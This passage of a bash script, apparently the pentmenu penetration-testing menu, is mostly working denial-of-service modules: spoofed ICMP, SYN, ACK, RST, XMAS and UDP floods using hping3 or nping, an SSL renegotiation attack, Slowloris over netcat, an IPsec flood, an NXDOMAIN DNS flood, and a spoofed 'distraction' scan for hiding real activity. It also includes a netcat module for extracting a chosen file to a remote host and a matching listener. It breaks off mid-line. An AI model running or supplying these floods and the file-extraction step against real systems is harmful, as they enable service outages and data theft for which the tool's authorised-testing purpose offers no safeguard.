target_input +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting ICMP echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood --spoof $SOURCE $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting ICMP Echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood --rand-source $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting ICMP Echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP${clear}\n" + echo -ne "${green}Starting ICMP Echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood $TARGET +fi +} +## +#----START BLACK NURSE +## +blacknurse() { + echo -ne "$(Info_Screen 'Preparing to launch ICMP Blacknurse Flood using hping3')\n\n" +#----need a target IP/hostname + target_input +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood --spoof $SOURCE $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood --rand-source $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP${clear}" + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood $TARGET +fi +} +## +#----START TCP SYN FLOOD +## +synflood() { + echo -ne "$(Info_Screen 'TCP SYN Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP SYN Flood +#----need a target IP/hostname + target_input +#----need a port to send TCP SYN packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the SYN packet? Default is to send no data + read_all Send data with SYN packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "${red}Invalid integer! ${clear}${green} Using data length of 3000 bytes${clear}\n" +fi +#----if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----note that virtual fragmentation is set. The default for hping3 is 16 bytes. +#----fragmentation should therefore place more stress on the target system +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${yellow}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -S $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --rand-source -p $PORT -S $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood --frag -p $PORT -S $TARGET +else + echo -ne "${red}Not a valid option!${clear}${yellow} Using interface IP${clear}\n" + echo -ne "${green}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag -p $PORT -S $TARGET +fi +#----No hping3 so using nping for TCP SYN Flood +else + echo -ne "${red}hping3 not found :(${clear}${yellow} trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP SYN Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname +target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURCE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "\n${green}Starting TCP SYN Flood...${clear}\n" +#----begin TCP SYN flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags syn --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags syn --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START TCP ACK FLOOD +## +ackflood() { + echo -ne "$(Info_Screen 'TCP ACK Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP ACK Flood + target_input +#----need a port to send TCP ACK packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURCE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the ACK packet? Default is to send no data + read_all Send data with ACK packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "\n${red}Invalid integer!${clear}${yellow} Using data length of 3000 bytes${clear}\n" +fi +#if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----start TCP ACK flood using values defined earlier +#----note that virtual fragmentation is set. The default for hping3 is 16 bytes. +#----fragmentation should therefore place more stress on the target system +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -A $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --rand-source -p $PORT -A $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood --frag -p $PORT -A $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP\n" + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag -p $PORT -A $TARGET +fi +#----No hping3 so using nping for TCP ACK Flood +else + echo -ne "${red}hping3 not found :(${clear}${yellow} trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP ACK Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname + target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "\n${green}Starting TCP ACK Flood...${clear}\n" +#----begin TCP ACK flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags ack --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags ack --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START TCP RST FLOOD +## +rstflood() { + echo -ne "$(Info_Screen ' +-TCP RST Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP RST Flood + target_input +#----need a port to send TCP RST packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the RST packet? Default is to send no data + read_all Send data with RST packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "${red}Invalid integer!${clear}${yellow} Using data length of 3000 bytes${clear}\n" +fi +#----if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----start TCP RST flood using values defined earlier +#----note that virtual fragmentation is set. The default for hping3 is 16 bytes. +#----fragmentation should therefore place more stress on the target system +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -R $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --rand-source -p $PORT -R $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood --frag -p $PORT -R $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP${clear}\n" + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag -p $PORT -R $TARGET +fi +#----No hping3 so using nping for TCP RST Flood +else + echo -ne "${red}hping3 not found :(${clear}${yellow} trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP RST Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname + target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "${green}Starting TCP RST Flood...${clear}\n" +#----begin TCP RST flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags rst --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags rst --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START TCP XMAS FLOOD +## +xmasflood() { + echo -ne "$(Info_Screen ' +-TCP XMAS Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP XMAS Flood +#----need a target IP/hostname + target_input +#----need a port to send TCP XMAS packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the XMAS packet? Default is to send no data + read_all Send data with XMAS packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "${red}Invalid integer!${clear}${yellow} Using data length of 3000 bytes${clear}\n" +fi +#----if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----start TCP XMAS flood using values defined earlier +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --spoof $SOURCE -p $PORT -F -S -R -P -A -U -X -Y $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --rand-source -p $PORT -F -S -R -P -A -U -X -Y $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood -p $PORT -F -S -R -P -A -U -X -Y $TARGET +else + echo -ne "${red}Not a valid option!${clear}${yellow} Using interface IP${clear}\n" + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA -p $PORT -F -S -R -P -A -U -X -Y $TARGET +fi +#----No hping3 so using nping for TCP RST Flood +else + echo -ne "${red}hping3 not found :( ${clear}${yellow}trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP XMAS Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname + target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "${green}Starting TCP XMAS Flood...${clear}\n" +#----begin TCP RST flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags cwr,ecn,urg,ack,psh,rst,syn,fin --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags cwr,ecn,urg,ack,psh,rst,syn,fin --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START UDP FLOOD +## +udpflood() { + echo -ne "$(Info_Screen ' +-UDP Flood uses hping3...checking for hping3...')\n\n" +#----check for hping on the local system +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for UDP Flood +#----need a valid target IP/hostname + target_input +#----need a valid target UDP port + target_input_port + : ${PORT:=80} + dos_port_check +#----curently only accepts stdin. Can't define a file to read from + read_all Enter random string data to send ; DATA=${r_a} +#----what source IP should we write to sent packets? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----start the attack using values defined earlier +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --spoof $SOURCE --udp --sign $DATA -p $PORT $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --rand-source --udp --sign $DATA -p $PORT $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --udp --sign $DATA -p $PORT $TARGET +#----if no valid source option is selected, use outgoing interface IP +else + echo -ne "${red}Not a valid option! ${clear}${yellow} Using interface IP${clear}\n" + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --udp --sign $DATA -p $PORT $TARGET +fi +#----If no hping3, use nping for UDP Flood instead. Not ideal but it will work. +else + echo -ne "${red}hping3 not found :( ${clear}${yellow}trying nping instead${clear}\n" + echo -ne "${yellow}Trying UDP Flood with nping..${clear}\n" +#----need a valid target IP/hostname + target_input +#----need a port to send UDP packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----what source address should we use in sent packets? + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----how many packets should we try to send each second? + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----how many packets should we send in total? + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} +#----default values will send 10k packets each second, for 10 seconds +#----curently only accepts stdin. Can't define a file to read from + read_all Enter string to send data ; DATA=${r_a} + echo -ne "${green}Starting UDP Flood...${clear}\n" +#----start the UDP flood using values we defined earlier +if [ "$SOURCE" = "i" ]; then + nping --udp --dest-port $PORT --data-string $DATA --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --udp --dest-port $PORT --data-string $DATA --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START SSL DOS +## +ssldos() { +echo -ne "$(Info_Screen ' +-Using openssl for SSL/TLS DOS')\n\n" +#----need a target IP/hostname + target_input +#----need a target port + read_all Enter target port defaults to 443 ; PORT=${r_a} + : ${PORT:=443} +#----check a valid target port is entered otherwise assume port 443 +if ! [[ "$PORT" =~ ^[0-9]+$ ]]; then + PORT=443 && echo -ne "${red}You provided a string, not a port number! ${clear}${yellow} Reverting to port 443${clear}\n" +fi +if [ "$PORT" -lt "1" ]; then + PORT=443 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 443${clear}\n" +elif [ "$PORT" -gt "65535" ]; then + PORT=443 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 443${clear}\n" +else + echo -ne "${yellow}Using port ${clear}$PORT\n" +fi +#----do we want to use client renegotiation? + read_all Use client renegotiation? [y]es or [n]o default ; NEGOTIATE=${r_a} + : ${NEGOTIATE:=n} +if [[ $NEGOTIATE = y ]]; then +#----if client renegotiation is selected for use, launch the attack supporting it + echo -ne "${green}Starting SSL DOS attack...Use 'Ctrl c' to quit${clear}\n" && sleep 1 +while : for i in {1..10} + do echo "spawning instance, attempting client renegotiation"; echo "R" | openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & +done +elif [[ $NEGOTIATE = n ]]; then +#----if client renegotiation is not requested, lauch the attack without support for it + echo -ne "${green}Starting SSL DOS attack...Use 'Ctrl c' to quit${clear}\n" && sleep 1 +while : for i in {1..10} + do echo "spawning instance"; openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & +done +#----if an invalid option is chosen for client renegotiation, launch the attack without it +else + echo -ne "${red}Invalid option, assuming no client renegotiation${clear}\n${green}Starting SSL DOS attack...Use 'Ctrl c' to quit${clear}\n" && sleep 1 +while : for i in {1..10} + do echo "spawning instance"; openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & +done +fi +} +## +#----START SLOW LORIS +## +slowloris() { + echo -ne "$(Info_Screen ' +-Using netcat for Slowloris attack....')\n" && sleep 1 +#----need a target IP or hostname + target_input +#----need a target port + target_input_port + : ${PORT:=80} + dos_port_check +#----how many connections should we attempt to open with the target? +#----there is no hard limit, it depends on available resources. Default is 2000 simultaneous connections + read_all Enter number of connections to open default 2000 ; CONNS=${r_a} + : ${CONNS:=2000} +#----ensure a valid integer is entered +if ! [[ "$CONNS" =~ ^[0-9]+$ ]]; then + CONNS=2000 && echo -ne "${red}Invalid integer! ${clear}${yellow} Using 2000 connections${clear}\n" +fi +#----how long do we wait between sending header lines? +#----too long and the connection will likely be closed +#----too short and our connections have little/no effect on server +#----either too long or too short is bad. Default random interval is a sane choice +echo -ne "\n\e[38;5;19;1;48;5;245mChoose interval between sending headers.${clear}\n" +read_all Default is [r]andom, between 5 and 15 seconds, or enter interval in seconds ; INTERVAL=${r_a} + : ${INTERVAL:=r} +if [[ "$INTERVAL" = "r" ]]; then +#----if default (random) interval is chosen, generate a random value between 5 and 15 +#----note that this module uses $RANDOM to generate random numbers, it is sufficient for our needs + INTERVAL=$((RANDOM % 11 + 5)) +#----check that r (random) or a valid number is entered +elif ! [[ "$INTERVAL" =~ ^[0-9]+$ ]] && ! [[ "$INTERVAL" = "r" ]]; then +#----if not r (random) or valid number is chosen for interval, assume r (random) + INTERVAL=$((RANDOM % 11 + 5)) && echo -ne "${red}Invalid integer! ${clear}${yellow} Using random value between 5 and 15 seconds${clear}\n" +fi +#----run stunnel_client function +stunnel_client +if [[ "$SSL" = "y" ]]; then +#----if SSL is chosen, set the attack to go through local stunnel listener + echo -ne "${green}Launching Slowloris....Use 'Ctrl c' to exit prematurely${clear}\n" && sleep 1 + i=1 +while [ "$i" -le "$CONNS" ]; do + echo -ne "${yellow}Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds${clear}" ; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $LHOST $LPORT 2>/dev/null 1>/dev/null & i=$((i + 1)); done + echo -ne "${yellow}Opened $CONNS connections....returning to menu${clear}\n" +else +#----if SSL is not chosen, launch the attack on the server without using a local listener + echo -ne "${green}Launching Slowloris....Use 'Ctrl c' to exit prematurely${clear}\n" && sleep 1 + i=1 +while [ "$i" -le "$CONNS" ]; do + echo -ne "${yellow}Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds${clear}" ; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & i=$((i + 1)); done +#----return to menu once requested number of connections has been opened or resources are exhausted + echo -ne "${yellow}Opened $CONNS connections....returning to menu${clear}\n" +fi +} +## +#----START IPSEC DOS +## +ipsecdos() { + echo -ne "$(Info_Screen ' +-This module will attempt to spoof an IPsec server, with a spoofed source address')\n\n" + target_input +#----launch DOS with a random source address by default + echo -ne "${green}IPsec DOS underway...use 'Ctrl C' to stop${clear}\n" && +while : +do ike-scan -A -B 100M -t 1 --sourceip=random $TARGET 1>/dev/null; ike-scan -B 100M -t 1 -q --sourceip=random $TARGET 1>/dev/null +done +} +## +#----START DISTRACTION +## +distractionscan() { + echo -ne "$(Info_Screen ' +-This module will send a TCP SYN scan with a spoofed source address" +-This module is designed to be obvious, to distract your target from any real scan +-or other activity you may actually be performing')\n\n" +#----need target IP/hostname + target_input +#----need a spoofed source address + read_all Enter spoofed source address ; SOURE=${r_a} +#----use hping to perform multiple obvious TCP SYN scans +for i in {1..50}; do echo -ne "${green}sending scan $i${clear}" && hping3 --scan all --spoof $SOURCE -S $TARGET 2>/dev/null 1>/dev/null; done +} +## +#----START NXDOMAIN FLOOD +## +nxdomainflood() { + echo -ne "$(Info_Screen ' +-This module is designed to stress test a DNS server by flooding it with queries +-for domains that do not exist')\n\n" + read_all Enter the IP address of the target DNS server ; DNSTARGET=${r_a} + echo -ne "${green}Starting DNS NXDOMAIN Query Flood to $DNSTARGET${clear}\n" && sleep 1 +while : +do dig $RANDOM.$RANDOM$RANDOM @$DNSTARGET +done +} +## +#----EXTRACTION menu +## +extractionmenu() { +MenuTitle EXTRACTION MENU ; MenuColor 20 1 SEND FILE ; MenuColor 20 2 CREATE LISTENER ; MenuColor 20 3 RETURN TO MAIN MENU ; MenuEnd 23 + case $m_a in + 1) sendfile ;; 2) listener ;; 3) reconmenu ;; 0) exit 0 ;; [bB]) reconmenu ;; *) invalid_entry ; extractionmenu ;; + esac +} +## +#----START SENDFILE +## +sendfile() { +echo -ne "$(Info_Screen ' +-This module will allow you to send a file over TCP or UDP +-You can use the Listener to receive such a file')\n\n" + read_all Enter protocol, [t]cp default or [u]dp ; PROTO=${r_a} + : ${PROTO:=t} +#----if not t (tcp) or u (udp) is chosen, assume tcp required +if [ "$PROTO" != "t" ] && [ "$PROTO" != "u" ]; then + echo -ne "${red}Invalid protocol option selected,${clear}${yellow} assuming tcp!${clear}\n" && PROTO=t && echo "" +fi +#----need to know the IP of the receiving end + read_all Enter the IP of the receving server ; RECEIVER=${r_a} +#----need to know a destination port on the server + target_input_port + : ${PORT:=80} + dos_port_check +#----what file are we sending? + read_all Enter the FULL PATH of the file you want to extract ; EXTRACT=${r_a} +#----send the file + echo -ne "${green}Sending the file to${clear} $RECEIVER:$PORT\n" +if [ "$PROTO" = "t" ]; then + nc -w 3 -n -N $RECEIVER $PORT < $EXTRACT +else + nc -n -N -u $RECEIVER $PORT < $EXTRACT +fi + echo "Done" +#----generate hashes of file we are sending +echo -ne "${yellow}Generating hash checksums${clear}\n" +md5sum $EXTRACT +echo "" +sha512sum $EXTRACT +sleep 1 +} +## +#----START LISTENER +## +listener() { +echo -ne "$(Info_Screen ' +-This module will create a TCP or UDP listener using netcat +-Any data (string or file) received will be written out to ./pentmenu.listener.out')\n" + read_all Enter protocol, [t]cp default or [u]dp ; PROTO=${r_a} + : ${PROTO:=t} +#----if not t (tcp) or u (udp) is chosen, assume tcp listener required +if [ "$PROTO" != "t" ] && [ "$PROTO" != "u" ]; then + echo -ne "${red}Invalid protocol option selected,${clear}${yellow} assuming tcp!${clear}" && PROTO=t && echo "" +fi +#----show listening ports on system using ss (if available) otherwise use netstat + echo -ne "$(Info_Screen ' +-Listing current listening ports on this system. +-Do not attempt to create a listener on one of these ports, it will not work.')\n\n" +if test -f "/bin/ss"; then + LISTPORT=ss; +else + LISTPORT=netstat +fi +#----now we can ask what port to create listener on +#----it cannot of course listen on a port already in use + $LISTPORT -$PROTO -n -l + read_all Enter port number to listen on defaults to 8000 ; PORT=${r_a} + : ${PORT:=8000} +#----if not an integer is entered, assume default port 8000 +if ! [[ "$PORT" =~ ^[0-9]+$ ]]; then + PORT=8000 && echo -ne "${red}You provided a string, not a port number! ${clear}${yellow} Reverting to port 8000${clear}\n" +fi +#----ensure a valid port number, between 1 and 65,535 (inclusive) is entered +if [ "$PORT" -lt "1" ]; then + PORT=8000 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 8000${clear}\n" +elif [ "$PORT" -gt "65535" ]; then + PORT=8000 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 8000${clear}\n" +fi +#----define where to save everything received to the listener + read_all Enter output file defaults to pentmenu.listener.out ; OUTFILE=${r_a} + : ${OUTFILE:=pentmenu.listener.out} + echo -ne "\n${yellow}Use ctrl c to stop${clear}\n" +#----create the listener +if [ "$PROTO" = "t" ] && [ "$PORT" -lt "1025" ]; then + nc -n -l -v -p $PORT > $OUTFILE +elif [ "$PROTO" = "t" ] && [ "$PORT" -gt "1024" ]; then + nc -n -l -v -p $PORT > $OUTFILE +elif [ "$PROTO" = "u" ] && [ "$PORT" -lt "1025" ]; then + nc -n -u -k -l -v -p $PORT > $OUTFILE +elif [ "$PROTO" = "u" ] && [ "$PORT" -gt "1024" ]; then + nc -n -u -k -l -v -p $PORT > $OUTFILE +fi +#----done message and checksums will only work for tcp file transfer +#----with udp, the connection has to be manually closed with 'ctrl C' +sync && echo -ne "\n${green}Done${clear}\n" +#----generate hashes of file received +echo -ne "${green}Generating hash checksums${clear}\n" +md5sum $OUTFILE +echo "" +sha512sum $OUTFILE +sleep 1 +} +## +#----START SHOW README +## +#----use curl to show the readme file +showreadme() { +curl -s https://raw.githubusercontent.com/GinjaChris/pentmenu/master/README.md | more +} +## +#----START STUNNEL +## +stunnel_client() { + read_all use SSL/TLS? [y]es or [n]o default ; SSL=${r_a} + : ${SSL:=n} +#----if not using SSL/TLS, carry on what we were doing +#----otherwise create an SSL/TLS tunnel using a local listener on TCP port 9991 +if [[ "$SSL" = "y" ]]; then + echo -ne "${yellow}Using SSL/TLS${clear}" + LHOST=127.0.0.1 + LPORT=9991 +#----ascertain if stunnel is defined in /etc/services and if not, add it & set permissions correctly + grep -q $LPORT /etc/services +if [[ $? = 1 ]]; then + echo "Adding pentmenu stunnel service to /etc/services" && chmod 777 /etc/services && echo "pentmenu-stunnel-client 9991/tcp #pentmenu stunnel client listener" >> /etc/services && chmod 644 /etc/services +fi +#----is ss is available, use that to shoew listening ports +if test -f "/bin/ss"; then + LISTPORT=ss; +#otherwise use netstat +else + LISTPORT=netstat +fi +#----show listening ports and check for port 9991 + $LISTPORT -tln | grep -q $LPORT +if [[ "$?" = "1" ]]; then +#----if nothing is running on port 9991, create stunnel configuration + echo -ne "${yellow}Creating stunnel client on ${clear}\n$LHOST:$LPORT" + rm -f 